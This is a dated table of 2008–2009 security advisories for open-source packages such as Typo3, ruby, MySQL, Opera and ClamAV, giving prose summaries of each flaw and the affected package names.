| 2009-02-09 | Secunia reports: Some vulnerabilities have been reported in Typo3, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting and session fixation attacks, and compromise a vulnerable system. The "Install tool" system extension uses insufficiently random entropy sources to generate an encryption key, resulting in weak security. The authentication library does not properly invalidate supplied session tokens, which can be exploited to hijack a user's session. Certain unspecified input passed to the "Indexed Search Engine" system extension is not properly sanitised before being used to invoke commands. This can be exploited to inject and execute arbitrary shell commands. Input passed via the name and content of files to the "Indexed Search Engine" system extension is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Certain unspecified input passed to the Workspace module is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Note: It is also reported that certain unspecified input passed to test scripts of the "ADOdb" system extension is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected website. more... | typo3 |
| 2009-02-09* | The official ruby site reports: Several vulnerabilities in safe level have been discovered: untrace_var is permitted at safe level 4; $PROGRAM_NAME may be modified at safe level 4; insecure methods may be called at safe level 1-3; syslog operations are permitted at safe level 4; dl doesn't check taintness, so it could allow attackers to call dangerous functions. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma |
| 2009-02-09* | The official ruby site reports: WEBrick::HTTP::DefaultFileHandler is vulnerable to requests that take exponential time to process, due to a backtracking regular expression in WEBrick::HTTPUtils.split_header_value. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma |
| 2009-02-09* | The official ruby site reports: resolv.rb allows remote attackers to spoof DNS answers. This risk can be reduced by randomness of DNS transaction IDs and source ports. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma |
| 2009-02-06 | Todd Miller reports: A bug was introduced in Sudo's group matching code in version 1.6.9 when support for matching based on the supplemental group vector was added. This bug may allow certain users listed in the sudoers file to run a command as a different user than their access rule specifies. more... | sudo |
| 2009-02-04 | Drupal Team reports: The Content Translation module for Drupal 6.x enables users to make a translation of an existing item of content (a node). In that process the existing node's content is copied into the new node's submission form. The module contains a flaw that allows a user with the 'translate content' permission to potentially bypass normal viewing access restrictions, for example allowing the user to see the content of unpublished nodes even if they do not have permission to view unpublished nodes. When user profile pictures are enabled, the default user profile validation function will be bypassed, possibly allowing invalid user names or e-mail addresses to be submitted. more... | drupal5 drupal6 |
| 2009-02-04* | According to CVE-2008-5498 entry: Array index error in the "imageRotate" function in PHP 5.2.8 and earlier allows context-dependent attackers to read the contents of arbitrary memory locations via a crafted value of the third argument (aka the "bgd_color" or "clrBack" argument) for an indexed image. more... | php5-gd |
| 2009-02-03 | Secunia reports: Paul Szabo has reported a vulnerability in Perl File::Path::rmtree, which potentially can be exploited by malicious, local users to gain escalated privileges. The vulnerability is caused due to a race condition in the way File::Path::rmtree handles directory permissions when cleaning up directories. This can be exploited by replacing an existing sub directory in the directory tree with a symbolic link to an arbitrary file. Successful exploitation may allow changing permissions of arbitrary files, if root uses an application using the vulnerable code to delete files in a directory having a world-writable sub directory. more... | perl |
| 2009-01-30 | Secunia reports: Input passed to multiple parameters in action/AttachFile.py is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. Certain input passed to security/antispam.py is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. more... | moinmoin |
| 2009-01-30* | Secunia reports: Spike Spiegel has discovered a vulnerability in Ganglia which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error within the process_path function in gmetad/server.c. This can be exploited to cause a stack-based buffer overflow by e.g. sending a specially crafted message to the gmetad service. The vulnerability is confirmed in version 3.1.1. Other versions may also be affected. more... | ganglia-monitor-core ganglia-monitor-webfrontend |
| 2009-01-28 | The GLPI project reports: Input passed via unspecified parameters is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. more... | glpi |
| 2009-01-25 | Core Security Technologies reports: Multiple cross-site scripting vulnerabilities have been found which may lead to arbitrary remote code execution on the server running the application due to unauthorized upload of Java plugin code. more... | openfire |
| 2009-01-23* | The Apache HTTP Server Project reports: A flaw in mod_imap when using the Referer directive with image maps. In certain site configurations a remote attacker could perform a cross-site scripting attack if a victim can be forced to visit a malicious URL using certain web browsers. more... | apache apache+ipv6 apache+mod_perl apache+mod_ssl apache+mod_ssl+ipv6 apache+mod_ssl+mod_accel apache+mod_ssl+mod_accel+ipv6 apache+mod_ssl+mod_accel+mod_deflate apache+mod_ssl+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_deflate apache+mod_ssl+mod_deflate+ipv6 apache+mod_ssl+mod_snmp apache+mod_ssl+mod_snmp+mod_accel apache+mod_ssl+mod_snmp+mod_accel+ipv6 apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_snmp+mod_deflate apache+mod_ssl+mod_snmp+mod_deflate+ipv6 apache+ssl apache_fp ru-apache ru-apache+mod_ssl |
| 2009-01-23* | A Watchfire whitepaper reports a vulnerability in the Apache webserver. The vulnerability can be exploited by malicious people to perform cross site scripting, web cache poisoning, session hijacking and, most importantly, to bypass web application firewall protection. Exploiting this vulnerability requires multiple carefully crafted HTTP requests, taking advantage of a caching server, proxy server, web application firewall etc. This only affects installations where Apache is used as an HTTP proxy in combination with the following web servers: IIS/6.0 and 5.0; Apache 2.0.45 (as web server); Apache 1.3.29; WebSphere 5.1 and 5.0; WebLogic 8.1 SP1; Oracle9iAS web server 9.0.2; SunONE web server 6.1 SP4. more... | apache apache+ipv6 apache+mod_perl apache+mod_ssl apache+mod_ssl+ipv6 apache+mod_ssl+mod_accel apache+mod_ssl+mod_accel+ipv6 apache+mod_ssl+mod_accel+mod_deflate apache+mod_ssl+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_deflate apache+mod_ssl+mod_deflate+ipv6 apache+mod_ssl+mod_snmp apache+mod_ssl+mod_snmp+mod_accel apache+mod_ssl+mod_snmp+mod_accel+ipv6 apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_snmp+mod_deflate apache+mod_ssl+mod_snmp+mod_deflate+ipv6 apache+ssl apache_fp ru-apache ru-apache+mod_ssl |
| 2009-01-21 | SecurityFocus reports: IPsec-Tools is affected by multiple remote denial-of-service vulnerabilities because the software fails to properly handle certain network packets. A successful attack allows a remote attacker to crash the software, denying further service to legitimate users. more... | ipsec-tools |
| 2009-01-20 | SecurityFocus reports: TeamSpeak is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. more... | teamspeak_server |
| 2009-01-19 | Secunia reports: A vulnerability has been reported in OptiPNG, which potentially can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in the BMP reader and can be exploited to cause a buffer overflow by tricking a user into processing a specially crafted file. Successful exploitation may allow execution of arbitrary code. more... | optipng |
| 2009-01-19 | Git maintainers report: gitweb has a possible local privilege escalation bug that allows a malicious repository owner to run a command of his choice by specifying diff.external configuration variable in his repository and running a crafted gitweb query. more... | git |
| 2009-01-15 | SecurityFocus reports: GNU's tar and cpio utilities are prone to a denial-of-service vulnerability because of insecure use of the alloca() function. Successfully exploiting this issue allows attackers to crash the affected utilities and possibly to execute code, but this has not been confirmed. more... | gtar |
| 2009-01-15 | Secunia reports: The vulnerability is caused due to a boundary error within the "str_read_packet()" function in libavformat/psxstr.c. This can be exploited to cause a heap-based buffer overflow via a specially crafted STR file. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2009-01-15* | securityfocus reports: An attacker with low-level privileges may exploit this issue to bypass authorization and cause arbitrary commands to run within the context of the Nagios server. This may aid in further attacks. more... | nagios nagios2 |
| 2009-01-13 | Secunia reports: A vulnerability has been reported in CGIWrap, which can be exploited by malicious people to conduct cross-site scripting attacks. The vulnerability is caused due to the application generating error messages without specifying a charset. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Successful exploitation may require that the victim uses Internet Explorer or a browser based on Internet Explorer components. more... | cgiwrap |
| 2009-01-11 | Secunia reports: Some security issues have been reported in PDFjam, which can be exploited by malicious, local users to perform certain actions with escalated privileges. The security issues are caused due to the "pdf90", "pdfjoin", and "pdfnup" scripts using temporary files in an insecure manner. This can be exploited to overwrite arbitrary files via symlink attacks. more... | pdfjam |
| 2009-01-11 | securityfocus reports: An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible. Verlihub is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input. Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application. more... | verlihub |
| 2009-01-11 | MySQL reports: The vulnerability is caused due to an error when processing an empty bit-string literal and can be exploited to crash the server via a specially crafted SQL statement. more... | mysql-server |
| 2009-01-11 | MySQL reports: Using RENAME TABLE against a table with explicit DATA DIRECTORY and INDEX DIRECTORY options can be used to overwrite system table information by replacing the file to which the symlink points. more... | mysql-server |
| 2009-01-11 | MySQL reports: A malformed password packet in the connection protocol could cause the server to crash. more... | mysql-server |
| 2009-01-11 | MySQL reports: The requirement of the DROP privilege for RENAME TABLE was not enforced. more... | mysql-server |
| 2009-01-11 | SANS reports: The University of Washington IMAP library is a library implementing the IMAP mail protocol. University of Washington IMAP is exposed to a buffer overflow issue that occurs due to a boundary error within the rfc822_output_char function in the c-client library. The University of Washington IMAP library versions prior to 2007e are affected. more... | imap-uw |
| 2009-01-11 | SANS reports: University of Washington "tmail" and "dmail" are mail delivery agents. "tmail" and "dmail" are exposed to local buffer overflow issues because they fail to perform adequate boundary checks on user-supplied data. more... | imap-uw |
| 2009-01-11 | securityfocus reports: The 'libcdaudio' library is prone to a remote heap-based buffer-overflow vulnerability that may allow an attacker to execute arbitrary code in the context of an application that uses the library. Failed attacks will cause denial-of-service conditions. A buffer-overflow in Grip occurs when the software processes a response to a CDDB query that has more than 16 matches. To exploit this issue, an attacker must be able to influence the response to a CDDB query, either by controlling a malicious CDDB server or through some other means. Successful exploits will allow arbitrary code to run. more... | libcdaudio |
| 2009-01-06* | SecurityFocus reports: The xterm program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input. Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application. more... | xterm |
| 2009-01-04 | Secunia reports: Morgan Todd has discovered a vulnerability in AWStats, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed in the URL to awstats.pl is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Successful exploitation requires that the application is running as a CGI script. more... | awstats awstats-devel |
| 2009-01-03 | Jan Lieskovsky reports: perl-File-Path rmtree race condition (CVE-2005-0448 was assigned to address this) This vulnerability was fixed in 5.8.4-7 but re-introduced in 5.8.8-1. It's also present in File::Path 2.xx, up to and including 2.07 which has only a partial fix. more... | p5-File-Path |
| 2009-01-02 | Jan Minar reports: Applying the ``D'' to a file with a crafted file name, or inside a directory with a crafted directory name, can lead to arbitrary code execution. Lack of sanitization throughout Netrw can lead to arbitrary code execution upon opening a directory with a crafted name. The Vim Netrw Plugin shares the FTP user name and password across all FTP sessions. Every time Vim makes a new FTP connection, it sends the user name and password of the previous FTP session to the FTP server. more... | vim vim-gnome vim-gtk2 vim-lite |
| 2008-12-31 | CORE Security Technologies reports: A format string error has been found on the vinagre_utils_show_error() function that can be exploited via commands issued from a malicious server containing format string specifiers on the VNC name. In a web based attack scenario, the user would be required to connect to a malicious server. Successful exploitation would then allow the attacker to execute arbitrary code with the privileges of the Vinagre user. more... | vinagre |
| 2008-12-30 | Marc Schoenefeld and Steve Milner of RedHat SRT and Peter Allor of IBM ISS report: XSS vulnerability with URLPARAM variable SEARCH variable allows arbitrary shell command execution more... | twiki |
| 2008-12-30 | Entry for CVE-2008-5619 says: html2text.php in RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch. more... | roundcube |
| 2008-12-30 | MySQL Team reports: Additional corrections were made for the symlink-related privilege problem originally addressed. The original fix did not correctly handle the data directory pathname if it contained symlinked directories in its path, and the check was made only at table-creation time, not at table-opening time later. more... | mysql-server |
| 2008-12-30 | A trapkit reports: MPlayer contains a stack buffer overflow vulnerability while parsing malformed TwinVQ media files. The vulnerability may be exploited by a (remote) attacker to execute arbitrary code in the context of MPlayer. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2008-12-26 | Secunia reports: A security issue has been reported in Ampache, which can be exploited by malicious, local users to perform certain actions with escalated privileges. The security issue is caused due to the "gather-messages.sh" script handling temporary files in an insecure manner. This can be exploited via symlink attacks to overwrite arbitrary files with the privileges of the user running the script. more... | ampache |
| 2008-12-25* | CUPS reports: The PNG image reading code did not validate the image size properly, leading to a potential buffer overflow (STR #2974) more... | cups-base |
| 2008-12-19 | The Opera Team reports: Manipulating certain text-area contents can cause a buffer overflow, which may be exploited to execute arbitrary code. Certain HTML constructs can cause the resulting DOM to change unexpectedly, which triggers a crash. To inject code, additional techniques will have to be employed. Exceptionally long host names in file: URLs can cause a buffer overflow, which may be exploited to execute arbitrary code. Remote Web pages cannot refer to file: URLs, so successful exploitation involves tricking users into manually opening the exploit URL, or a local file that refers to it. When Opera is previewing a news feed, some scripted URLs are not correctly blocked. These can execute scripts which are able to subscribe the user to any feed URL that the attacker chooses, and can also view the contents of any feeds that the user is subscribed to. These may contain sensitive information. Built-in XSLT templates incorrectly handle escaped content and can cause it to be treated as markup. If a site accepts content from untrusted users, which it then displays using XSLT as escaped strings, this can allow scripted markup to be injected. The scripts will then be executed in the security context of that site. more... | linux-opera opera |
| 2008-12-19 | The MediaWiki development team reports: Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Certain unspecified input related to uploads is not properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when a malicious data is opened. Successful exploitation may require that uploads are enabled and the victim uses an Internet Explorer based browser. Certain SVG scripts are not properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when a malicious data is opened. Successful exploitation may require that SVG uploads are enabled and the victim uses a browser supporting SVG scripting. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain operations when a logged in user visits a malicious site. more... | mediawiki |
| 2008-12-19 | The Drupal Project reports: The update system is vulnerable to Cross site request forgeries. Malicious users may cause the superuser (user 1) to execute old updates that may damage the database. When an input format is deleted, not all existing content on a site is updated to reflect this deletion. Such content is then displayed unfiltered. This may lead to cross site scripting attacks when harmful tags are no longer stripped from 'malicious' content that was posted earlier. more... | drupal5 drupal6 |
| 2008-12-19 | The Mozilla Foundation reports: MFSA 2008-69 XSS vulnerabilities in SessionStore MFSA 2008-68 XSS and JavaScript privilege escalation MFSA 2008-67 Escaped null characters ignored by CSS parser MFSA 2008-66 Errors parsing URLs with leading whitespace and control characters MFSA 2008-65 Cross-domain data theft via script redirect error message MFSA 2008-64 XMLHttpRequest 302 response disclosure MFSA 2008-62 Additional XSS attack vectors in feed preview MFSA 2008-61 Information stealing via loadBindingDocument MFSA 2008-60 Crashes with evidence of memory corruption (rv:1.9.0.5/1.8.1.19) more... | firefox linux-firefox linux-seamonkey linux-thunderbird seamonkey thunderbird |
| 2008-12-11 | The phpMyAdmin Team reports: A logged-in user can be subject of SQL injection through cross site request forgery. Several scripts in phpMyAdmin are vulnerable and the attack can be made through table parameter. more... | phpMyAdmin phpMyAdmin211 |
| 2008-12-08 | PHP Developers reports: Due to a security bug found in the PHP 5.2.7 release, it has been removed from distribution. The bug affects configurations where magic_quotes_gpc is enabled, because it remains off even when set to on. more... | php5 |
| 2008-12-07 | Secunia reports: A vulnerability has been reported in Wireshark, which can be exploited by malicious people to cause a DoS. The vulnerability is caused due to an error in the SMTP dissector and can be exploited to trigger the execution of an infinite loop via a large SMTP packet. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2008-12-07 | Secunia reports: Some vulnerabilities have been reported in PHP, where some have an unknown impact and others can potentially be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. An input validation error exists within the "ZipArchive::extractTo()" function when extracting ZIP archives. This can be exploited to extract files to arbitrary locations outside the specified directory via directory traversal sequences in a specially crafted ZIP archive. An error in the included PCRE library can be exploited to cause a buffer overflow. The problem is that the "BG(page_uid)" and "BG(page_gid)" variables are not initialized. No further information is currently available. The problem is that the "php_value" order is incorrect for Apache configurations. No further information is currently available. An error in the GD library can be exploited to cause a crash via a specially crafted font file. more... | php5 |
| 2008-12-07 | Debian reports: Faxspool in mgetty 1.1.36 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/faxsp.#### temporary file. more... | mgetty+sendfax |
| 2008-12-07 | Secunia reports: The security issue is caused due to an input validation error when processing script names. This can be exploited to read or modify arbitrary files having ".sieve" extensions via directory traversal attacks, with the privileges of the attacker's user id. more... | dovecot-managesieve |
| 2008-12-07 | Secunia reports: Input passed via the "habari_username" parameter when logging in is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | habari |
| 2008-12-07* | Tobias Klein from TrapKit reports: The VLC media player contains an integer overflow vulnerability while parsing malformed RealMedia (.rm) files. The vulnerability leads to a heap overflow that can be exploited by a (remote) attacker to execute arbitrary code in the context of VLC media player. more... | vlc-devel |
| 2008-12-06 | Secunia reports: EgiX has discovered a vulnerability in Mantis, which can be exploited by malicious users to compromise a vulnerable system. Input passed to the "sort" parameter in manage_proj_page.php is not properly sanitised before being used in a "create_function()" call. This can be exploited to execute arbitrary PHP code. more... | mantis |
| 2008-12-06 | Secunia reports: Some vulnerabilities have been reported in Mantis, which can be exploited by malicious users to compromise a vulnerable system and malicious people to conduct cross-site scripting and request forgery attacks. Input passed to the "filter_target" parameter in return_dynamic_filters.php is not properly sanitised before being returned to a user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. A vulnerability is caused due to the application allowing users to perform certain actions via HTTP requests without performing any validity checks to verify the request. This can be exploited to e.g. add a new user with administrative privileges by enticing a logged-in administrator to visit a malicious site. Input passed to the "value" parameter in adm_config_set.php is not properly sanitised before being used in an "eval()" statement. This can be exploited to e.g. execute arbitrary PHP commands via a specially crafted request. Input passed to the "language" parameter in account_prefs_update.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. more... | mantis |
| 2008-12-04 | Squirrelmail team reports: An issue was fixed that allowed an attacker to send specially-crafted hyperlinks in a message that could execute cross-site scripting (XSS) when the user viewed the message in SquirrelMail. more... | squirrelmail |
| 2008-11-29 | The OpenOffice Team reports: A security vulnerability with the way OpenOffice 2.x process WMF files may allow a remote unprivileged user who provides a StarOffice/StarSuite document that is opened by a local user to execute arbitrary commands on the system with the privileges of the user running StarOffice/StarSuite. No working exploit is known right now. A security vulnerability with the way OpenOffice 2.x process EMF files may allow a remote unprivileged user who provides a StarOffice/StarSuite document that is opened by a local user to execute arbitrary commands on the system with the privileges of the user running StarOffice/StarSuite. No working exploit is known right now. more... | openoffice.org-2 openoffice.org-2-devel openoffice.org-2-RC |
| 2008-11-29 | Secunia reports: Input passed via the HTTP "Host" header is not properly sanitised before being used. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site if malicious data is viewed. more... | de-wordpress wordpress wordpress-mu zh-wordpress |
| 2008-11-29 | Samba Team reports: Samba 3.0.29 and beyond contain a change to deal with gcc 4 optimizations. Part of the change modified range checking for client-generated offsets of secondary trans, trans2 and nttrans requests. These requests are used to transfer arbitrary amounts of memory from clients to servers and back using small SMB requests and contain two offsets: One offset (A) pointing into the PDU sent by the client and one (B) to direct the transferred contents into the buffer built on the server side. While the range checking for offset (B) is correct, a cut and paste error lets offset (A) pass completely unchecked against overflow. The buffers passed into trans, trans2 and nttrans undergo higher-level processing like DCE/RPC requests or listing directories. The missing bounds check means that a malicious client can make the server do this higher-level processing on arbitrary memory contents of the smbd process handling the request. It is unknown if that can be abused to pass arbitrary memory contents back to the client, but an important barrier is missing from the affected Samba versions. more... | ja-samba samba samba3 samba32-devel |
| 2008-11-29 | Secunia reports: A security issue has been reported in hplip, which can be exploited by malicious, local users to cause a DoS. The security issue is caused due to an error within hpssd.py when parsing certain requests. This can be exploited to crash the service by sending specially crafted requests to the default port 2207/TCP. more... | hplip |
| 2008-11-24 | Secunia reports: A vulnerability has been discovered in imlib2, which can be exploited by malicious people to potentially compromise an application using the library. The vulnerability is caused due to a pointer arithmetic error within the "load()" function provided by the XPM loader. This can be exploited to cause a heap-based buffer overflow via a specially crafted XPM file. Successful exploitation may allow execution of arbitrary code. more... | imlib2 imlib2-nox11 |
| 2008-11-23 | Secunia reports: A boundary error exists within http_parse_sc_header() in lib/http.c when parsing an overly long HTTP header starting with "Zwitterion v". A boundary error exists within http_get_pls() in lib/http.c when parsing a specially crafted pls playlist containing an overly long entry. A boundary error exists within http_get_m3u() in lib/http.c when parsing a specially crafted m3u playlist containing an overly long "File" entry. more... | streamripper |
| 2008-11-23* | The Mozilla Foundation reports: MFSA 2008-58 Parsing error in E4X default namespace MFSA 2008-57 -moz-binding property bypasses security checks on codebase principals MFSA 2008-56 nsXMLHttpRequest::NotifyEventListeners() same-origin violation MFSA 2008-55 Crash and remote code execution in nsFrameManager MFSA 2008-54 Buffer overflow in http-index-format parser MFSA 2008-53 XSS and JavaScript privilege escalation via session restore MFSA 2008-52 Crashes with evidence of memory corruption (rv:1.9.0.4/1.8.1.18) MFSA 2008-51 file: URIs inherit chrome privileges when opened from chrome MFSA 2008-50 Crash and remote code execution via __proto__ tampering MFSA 2008-49 Arbitrary code execution via Flash Player dynamic module unloading MFSA 2008-48 Image stealing via canvas and HTTP redirect MFSA 2008-47 Information stealing via local shortcut files MFSA 2008-46 Heap overflow when canceling newsgroup message MFSA 2008-44 resource: traversal vulnerabilities MFSA 2008-43 BOM characters stripped from JavaScript before execution MFSA 2008-42 Crashes with evidence of memory corruption (rv:1.9.0.2/1.8.1.17) MFSA 2008-41 Privilege escalation via XPCnativeWrapper pollution MFSA 2008-38 nsXMLDocument::OnChannelRedirect() same-origin violation MFSA 2008-37 UTF-8 URL stack buffer overflow more... | firefox linux-firefox linux-seamonkey linux-thunderbird seamonkey thunderbird |
| 2008-11-22 | The mantis Team reports: When configuring a web application to use only ssl (e. g. by forwarding all http-requests to https), a user would expect that sniffing and hijacking the session is impossible. Though, for this to be secure, one needs to set the session cookie to have the secure flag. Else the cookie will be transferred through http if the victim's browser does a single http-request on the same domain. more... | mantis |
| 2008-11-19 | Timo Sirainen reports in dovecot 1.1.4 release notes: ACL plugin fixes: Negative rights were actually treated as positive rights. 'k' right didn't prevent creating parent/child/child mailbox. ACL groups weren't working. more... | dovecot |
| 2008-11-19 | Secunia reports: Two vulnerabilities have been reported in Libxml2, which can be exploited by malicious people to cause a DoS (Denial of Service) or to potentially compromise an application using the library. 1) An integer overflow error in the "xmlSAX2Characters()" function can be exploited to trigger a memory corruption via a specially Successful exploitation may allow execution of arbitrary code, but requires e.g. that the user is tricked into processing an overly large XML file (2GB or more). 2) An integer overflow error in the "xmlBufferResize()" function can be exploited to trigger the execution of an infinite loop. The vulnerabilities are reported in version 2.7.2. Other versions may also be affected. more... | libxml2 |
| 2008-11-19 | Andreas Kurtz reports: The jabber server Openfire ( more... | openfire |
| 2008-11-18 | Ulf Harnhammar of Secunia Research reports: Stack-based buffer overflow in the read_special_escape function in src/psgen.c in GNU Enscript 1.6.1 and 1.6.4 beta, when the -e (aka special escapes processing) option is enabled, allows user-assisted remote attackers to execute arbitrary code via a crafted ASCII file, related to the setfilename command. more... | enscript-a4 enscript-letter enscript-letterdj |
| 2008-11-16 | SecurityFocus reports: GnuTLS is prone to a security-bypass vulnerability because the application fails to properly validate chained X.509 certificates. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks by impersonating trusted servers. Unsuspecting users may be under a false sense of security that can aid attackers in launching further attacks. more... | gnutls |
| 2008-11-13* | CVE reports: Heap-based buffer overflow in the decodeMP4file function (frontend/main.c) in FAAD2 2.6.1 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted MPEG-4 (MP4) file. more... | faad2 |
| 2008-11-11* | The VLC Team reports: The VLC media player contains a stack overflow vulnerability while parsing malformed cue files. The vulnerability may be exploited by a (remote) attacker to execute arbitrary code in the context of VLC media player. more... | vlc vlc-devel |
| 2008-11-10 | Advisory from Moritz Jodeit, November 8th, 2008: ClamAV contains an off-by-one heap overflow vulnerability in the code responsible for parsing VBA project files. Successful exploitation could allow an attacker to execute arbitrary code with the privileges of the `clamd' process by sending an email with a prepared attachment. A VBA project file embedded inside an OLE2 office document send as an attachment can trigger the off-by-one. Entry from Thu Oct 30 13:52:42 CET 2008 (acab) in ChangeLog: libclamav/vba_extract.c: get_unicode_name off-by-one, bb#1239 reported by Moritz Jodeit >moritz*jodeit.org more... | clamav clamav-devel |
| 2008-11-09 | Trac development team reports: 0.11.2 is a new stable maintenance release. It contains several security fixes and everyone is recommended to upgrade their installations. Bug fixes: Fixes potential DOS vulnerability with certain wiki markup. more... | ja-trac trac |
| 2008-11-07 | Emacs developers report: The Emacs command `run-python' launches an interactive Python interpreter. After the Python process starts up, Emacs automatically sends it the line: import emacs which normally imports a script named emacs.py which is distributed with Emacs. This script, which is typically located in a write-protected installation directory with other Emacs program files, defines various functions to help the Python process communicate with Emacs. The vulnerability arises because Python, by default, prepends '' to the module search path, so modules are looked for in the current directory. If the current directory is world-writable, an attacker may insert malicious code by adding a fake Python module named emacs.py into that directory. more... | emacs |
| 2008-11-03 | Opera reports: When certain parameters are passed to Opera's History Search, they can cause content not to be correctly sanitized. This can allow scripts to be injected into the History Search results page. Such scripts can then run with elevated privileges and interact with Opera's configuration, allowing them to execute arbitrary code. The links panel shows links in all frames on the current page, including links with JavaScript URLs. When a page is held in a frame, the script is incorrectly executed on the outermost page, not the page where the URL was located. This can be used to execute scripts in the context of an unrelated frame, which allows cross-site scripting. more... | linux-opera opera |
| 2008-11-02 | Aurelien Jarno reports: CVE-2008-4539: fix a heap overflow in Cirrus emulation. The code in hw/cirrus_vga.c has changed a lot between the time CVE-2007-1320 was announced and the time the patch was applied. As a consequence it was applied wrongly and QEMU is still vulnerable to this bug if using VNC. more... | qemu qemu-devel |
| 2008-10-31* | SecurityFocus reports: phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. more... | phpMyAdmin phpMyAdmin211 |
| 2008-10-29* | Opera reports: Certain constructs are not escaped correctly by Opera's History Search results. These can be used to inject scripts into the page, which can then be used to look through the user's browsing history, including the contents of the pages they have visited. These may contain sensitive information. If a link that uses a JavaScript URL triggers Opera's Fast Forward feature, when the user activates Fast Forward, the script should run on the current page. When a page is held in a frame, the script is incorrectly executed on the outermost page, not the page where the URL was located. This can be used to execute scripts in the context of an unrelated frame, which allows cross-site scripting. When Opera is previewing a news feed, some scripts are not correctly blocked. These scripts are able to subscribe the user to any feed URL that the attacker chooses, and can also view the contents of any feeds that the user is subscribed to. These may contain sensitive information. more... | linux-opera opera |
| 2008-10-29* | Opera reports: If a malicious page redirects Opera to a specially crafted address (URL), it can cause Opera to crash. Given sufficient address content, the crash could cause execution of code controlled by the attacking page. Once a Java applet has been cached, if a page can predict the cache path for that applet, it can load the applet from the cache, causing it to run in the context of the local machine. This allows it to read other cache files on the computer or perform other normally more restrictive actions. These files could contain sensitive information, which could then be sent to the attacker. more... | linux-opera opera |
| 2008-10-29* | The Opera Team reports: Scripts are able to change the addresses of framed pages that come from the same site. Due to a flaw in the way that Opera checks what frames can be changed, a site can change the address of frames on other sites inside any window that it has opened. This allows sites to open pages from other sites, and display misleading information on them. Custom shortcut and menu commands can be used to activate external applications. In some cases, the parameters passed to these applications are not prepared correctly, and may be created from uninitialized memory. These may be misinterpreted as additional parameters, and depending on the application, this could allow execution of arbitrary code. Successful exploitation requires convincing the user to modify their shortcuts or menu files appropriately, pointing to an appropriate target application, then to activate that shortcut at an appropriate time. To inject code, additional means will have to be employed. When insecure pages load content from secure sites into a frame, they can cause Opera to incorrectly report the insecure site as being secure. The padlock icon will incorrectly be shown, and the security information dialog will state that the connection is secure, but without any certificate information. As a security precaution, Opera does not allow Web pages to link to files on the user's local disk. However, a flaw exists that allows Web pages to link to feed source files on the user's computer. Suitable detection of JavaScript events and appropriate manipulation can unreliably allow a script to detect the difference between successful and unsuccessful subscriptions to these files, to allow it to discover if the file exists or not. In most cases the attempt will fail. It has been reported that when a user subscribes to a news feed using the feed subscription button, the page address can be changed. This causes the address field not to update correctly. Although this can mean that misleading information can be displayed in the address field, it can only leave the attacking page's address in the address bar, not a trusted third party address. more... | linux-opera opera |
| 2008-10-27 | CVE reports: Heap-based buffer overflow in the SPF_dns_resolv_lookup function in Spf_dns_resolv.c in libspf2 before 1.2.8 allows remote attackers to execute arbitrary code via a long DNS TXT record with a modified length field. more... | libspf2 |
